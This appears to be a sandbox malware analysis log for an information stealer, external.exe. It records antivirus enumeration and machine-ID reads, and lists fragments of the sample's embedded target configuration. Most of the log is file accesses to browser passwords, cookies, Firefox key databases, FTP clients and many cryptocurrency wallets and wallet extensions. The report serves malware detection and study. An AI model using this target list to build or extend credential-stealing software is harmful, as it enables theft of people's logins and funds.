                Source: C:\Users\user\Desktop\external.exeProcess created: C:\Users\user\Desktop\external.exe "C:\Users\user\Desktop\external.exe"Jump to behavior
                Source: C:\Users\user\Desktop\external.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_007183DF
                Source: C:\Users\user\Desktop\external.exeCode function: EnumSystemLocalesW,0_2_007143A7
                Source: C:\Users\user\Desktop\external.exeCode function: EnumSystemLocalesW,0_2_00718630
                Source: C:\Users\user\Desktop\external.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,0_2_007186CB
                Source: C:\Users\user\Desktop\external.exeCode function: GetLocaleInfoW,0_2_0071897D
                Source: C:\Users\user\Desktop\external.exeCode function: EnumSystemLocalesW,0_2_0071891E
                Source: C:\Users\user\Desktop\external.exeCode function: EnumSystemLocalesW,0_2_00718A52
                Source: C:\Users\user\Desktop\external.exeCode function: GetLocaleInfoW,0_2_00718A9D
                Source: C:\Users\user\Desktop\external.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_00718B44
                Source: C:\Users\user\Desktop\external.exeCode function: GetLocaleInfoW,0_2_00718C4A
                Source: C:\Users\user\Desktop\external.exeCode function: GetLocaleInfoW,0_2_00713EAC
                Source: C:\Users\user\Desktop\external.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\external.exeCode function: 0_2_00707110 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00707110
                Source: C:\Users\user\Desktop\external.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                Source: external.exe, external.exe, 00000002.00000003.1935721640.0000000000DF1000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000003.1932697450.0000000000DEF000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000002.1996863889.0000000003490000.00000004.00000800.00020000.00000000.sdmp, external.exe, 00000002.00000003.1932578761.0000000000DE6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                Source: C:\Users\user\Desktop\external.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: Process Memory Space: external.exe PID: 7140, type: MEMORYSTR
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                Source: external.exeString found in binary or memory: erty.jaxx\\IndexedDB","m":["*"],"z":"Wallets/JAXX New Version","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Electrum\\wallets","m":["*"],"z":"Wallets/Electrum","d":0,"fs":20971520},{"t":0,"p":"%appdata%\\Electrum-LTC\\wallets","m":["*"],"z":"Wallets/Electrum-LT
                Source: external.exeString found in binary or memory: ","d":0,"fs":20971520},{"t":0,"p":"%appdata%\\ElectronCash\\wallets","m":["*"],"z":"Wallets/ElectronCash","d":0,"fs":20971520},{"t":0,"p":"%appdata%\\Guarda\\IndexedDB","m":["*"],"z":"Wallets/Guarda","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\DashCore\\wallet
                Source: external.exeString found in binary or memory: nmhnfnkdnaad","ez":"Coinbase","ldb":true},{"en":"hpglfhgfnhbgpjdenjgmdgoeiappafln","ez":"Guarda"},{"en":"blnieiiffboillknjnepogjhkgnoapac","ez":"EQUA"},{"en":"cjelfplplebdjjenllpjcblmjkfcffne","ez":"Jaxx Liberty"},{"en":"fihkakfobkmkjojpchpfgcmhfjnmnfpi","ez":
                Source: external.exeString found in binary or memory: oin\\wallets","m":["*"],"z":"Wallets/Bitcoin core","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Binance","m":["app-store.json",".finger-print.fp","simple-storage.json","window-state.json"],"z":"Wallets/Binance","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\com.li
                Source: external.exeString found in binary or memory: locpak","ez":"Bitget Wallet"}],"mx":[{"en":"webextension@metamask.io","ez":"MetaMask","et":"\"params\":{\"iterations\":600000}"}],"c":[{"t":0,"p":"%appdata%\\Ethereum","m":["keystore"],"z":"Wallets/Ethereum","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\Exodus\\
                Source: external.exeString found in binary or memory: "Petra"},{"en":"opcgpfmipidbgpenhmajoajpbobppdil","ez":"Sui"},{"en":"aholpfdialjgjfhomihkjbmgjidlcdno","ez":"ExodusWeb3"},{"en":"onhogfjeacnfoofkfgppdlbmlmnplgbn","ez":"Sub"},{"en":"mopnmbcafieddcagagdcbnhejhlodfdd","ez":"PolkadotJS"},{"en":"fijngjgcjhjmmpcmke
                Source: external.exeString found in binary or memory: locpak","ez":"Bitget Wallet"}],"mx":[{"en":"webextension@metamask.io","ez":"MetaMask","et":"\"params\":{\"iterations\":600000}"}],"c":[{"t":0,"p":"%appdata%\\Ethereum","m":["keystore"],"z":"Wallets/Ethereum","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\Exodus\\
                Source: external.exe, 00000002.00000003.1908135316.0000000000DF1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
                Source: external.exeString found in binary or memory: locpak","ez":"Bitget Wallet"}],"mx":[{"en":"webextension@metamask.io","ez":"MetaMask","et":"\"params\":{\"iterations\":600000}"}],"c":[{"t":0,"p":"%appdata%\\Ethereum","m":["keystore"],"z":"Wallets/Ethereum","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\Exodus\\
                Source: C:\Users\user\Desktop\external.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\Desktop\external.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
                Source: C:\Users\user\Desktop\external.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
                Source: C:\Users\user\Desktop\external.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
                Source: C:\Users\user\Desktop\external.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\Desktop\external.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\Desktop\external.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
                Source: C:\Users\user\Desktop\external.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
                Source: C:\Users\user\Desktop\external.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.jsJump to behavior
                Source: C:\Users\user\Desktop\external.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
                Source: C:\Users\user\Desktop\external.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
                Source: C:\Users\user\Desktop\external.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
                Source: C:\Users\user\Desktop\external.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
                Source: C:\Users\user\Desktop\external.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
                Source: C:\Users\user\Desktop\external.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
                Source: C:\Users\user\Desktop\external.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                Source: C:\Users\user\Desktop\external.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
                Source: C:\Users\user\Desktop\external.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
                Source: C:\Users\user\Desktop\external.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
                Source: C:\Users\user\Desktop\external.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
                Source: C:\Users\user\Desktop\external.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
                Source: C:\Users\user\Desktop\external.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.dbJump to behavior
                Source: C:\Users\user\Desktop\external.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
                Source: C:\Users\user\Desktop\external.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
                Source: C:\Users\user\Desktop\external.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
                Source: C:\Users\user\Desktop\external.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
                Source: C:\Users\user\Desktop\external.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
                Source: C:\Users\user\Desktop\external.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                Source: C:\Users\user\Desktop\external.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
                Source: C:\Users\user\Desktop\external.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
                Source: C:\Users\user\Desktop\external.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
                Source: C:\Users\user\Desktop\external.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
                Source: C:\Users\user\Desktop\external.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Users\user\Desktop\external.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
                Source: C:\Users\user\Desktop\external.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
                Source: C:\Users\user\Desktop\external.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\Users\user\Desktop\external.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\Desktop\external.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
                Source: C:\Users\user\Desktop\external.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
                Source: C:\Users\user\Desktop\external.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
                Source: C:\Users\user\Desktop\external.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
                Source: C:\Users\user\Desktop\external.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
                Source: C:\Users\user\Desktop\external.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\Users\user\Desktop\external.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
                Source: C:\Users\user\Desktop\external.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Users\user\Desktop\external.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
                Source: C:\Users\user\Desktop\external.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
                Source: C:\Users\user\Desktop\external.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
                Source: C:\Users\user\Desktop\external.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Users\user\Desktop\external.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
                Source: C:\Users\user\Desktop\external.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
                Source: C:\Users\user\Desktop\external.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
                Source: C:\Users\user\Desktop\external.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
                Source: C:\Users\user\Desktop\external.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
                Source: C:\Users\user\Desktop\external.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
                Source: C:\Users\user\Desktop\external.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
                Source: C:\Users\user\Desktop\external.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
                Source: C:\Users\user\Desktop\external.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.dbJump to behavior
                Source: C:\Users\user\Desktop\external.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
                Source: C:\Users\user\Desktop\external.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqliteJump to behavior
                Source: C:\Users\user\Desktop\external.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
                Source: C:\Users\user\Desktop\external.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
                Source: C:\Users\user\Desktop\external.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
                Source: C:\Users\user\Desktop\external.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
                Source: C:\Users\user\Desktop\external.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
                Source: C:\Users\user\Desktop\external.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
                Source: C:\Users\user\Desktop\external.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
                Source: C:\Users\user\Desktop\external.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
                Source: C:\Users\user\Desktop\external.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.jsonJump to behavior
                Source: C:\Users\user\Desktop\external.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
                Source: C:\Users\user\Desktop\external.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
                Source: C:\Users\user\Desktop\external.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
                Source: C:\Users\user\Desktop\external.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
                Source: C:\Users\user\Desktop\external.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Users\user\Desktop\external.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
                Source: C:\Users\user\Desktop\external.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
                Source: C:\Users\user\Desktop\external.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
                Source: C:\Users\user\Desktop\external.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
                Source: C:\Users\user\Desktop\external.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
                Source: C:\Users\user\Desktop\external.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
                Source: C:\Users\user\Desktop\external.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
                Source: C:\Users\user\Desktop\external.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
                Source: C:\Users\user\Desktop\external.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
                Source: C:\Users\user\Desktop\external.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
                Source: C:\Users\user\Desktop\external.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
                Source: C:\Users\user\Desktop\external.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
                Source: C:\Users\user\Desktop\external.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
                Source: C:\Users\user\Desktop\external.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
                Source: C:\Users\user\Desktop\external.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
                Source: C:\Users\user\Desktop\external.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
                Source: C:\Users\user\Desktop\external.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
                Source: C:\Users\user\Desktop\external.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
                Source: C:\Users\user\Desktop\external.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
                Source: C:\Users\user\Desktop\external.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
                Source: C:\Users\user\Desktop\external.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
                Source: C:\Users\user\Desktop\external.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
                Source: C:\Users\user\Desktop\external.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
                Source: C:\Users\user\Desktop\external.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                Source: C:\Users\user\Desktop\external.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
                Source: C:\Users\user\Desktop\external.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                Source: C:\Users\user\Desktop\external.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
                Source: C:\Users\user\Desktop\external.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
                Source: C:\Users\user\Desktop\external.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
                Source: C:\Users\user\Desktop\external.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
                Source: C:\Users\user\Desktop\external.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
                Source: C:\Users\user\Desktop\external.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
                Source: C:\Users\user\Desktop\external.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
                Source: C:\Users\user\Desktop\external.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Users\user\Desktop\external.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
                Source: C:\Users\user\Desktop\external.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
                Source: C:\Users\user\Desktop\external.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
                Source: C:\Users\user\Desktop\external.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
                Source: C:\Users\user\Desktop\external.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
                Source: C:\Users\user\Desktop\external.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
                Source: C:\Users\user\Desktop\external.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
                Source: C:\Users\user\Desktop\external.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
                Source: C:\Users\user\Desktop\external.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Users\user\Desktop\external.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Users\user\Desktop\external.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                Source: C:\Users\user\Desktop\external.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                Source: C:\Users\user\Desktop\external.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Users\user\Desktop\external.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Users\user\Desktop\external.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                Source: C:\Users\user\Desktop\external.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                Source: C:\Users\user\Desktop\external.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                Source: C:\Users\user\Desktop\external.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                Source: C:\Users\user\Desktop\external.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
                Source: C:\Users\user\Desktop\external.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
                Source: C:\Users\user\Desktop\external.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
                Source: C:\Users\user\Desktop\external.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
                Source: C:\Users\user\Desktop\external.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPUJump to behavior
                Source: C:\Users\user\Desktop\external.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPUJump to behavior
                Source: C:\Users\user\Desktop\external.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
                Source: C:\Users\user\Desktop\external.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
                Source: C:\Users\user\Desktop\external.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\external.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\external.exeDirectory queried: C:\Users\user\Documents\RAYHIWGKDIJump to behavior
                Source: C:\Users\user\Desktop\external.exeDirectory queried: C:\Users\user\Documents\RAYHIWGKDIJump to behavior
                Source: C:\Users\user\Desktop\external.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
                Source: C:\Users\user\Desktop\external.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
                Source: C:\Users\user\Desktop\external.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
                Source: C:\Users\user\Desktop\external.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
                Source: Yara matchFile source: 00000002.00000003.1908135316.0000000000DF1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000003.1908103899.0000000000DE6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
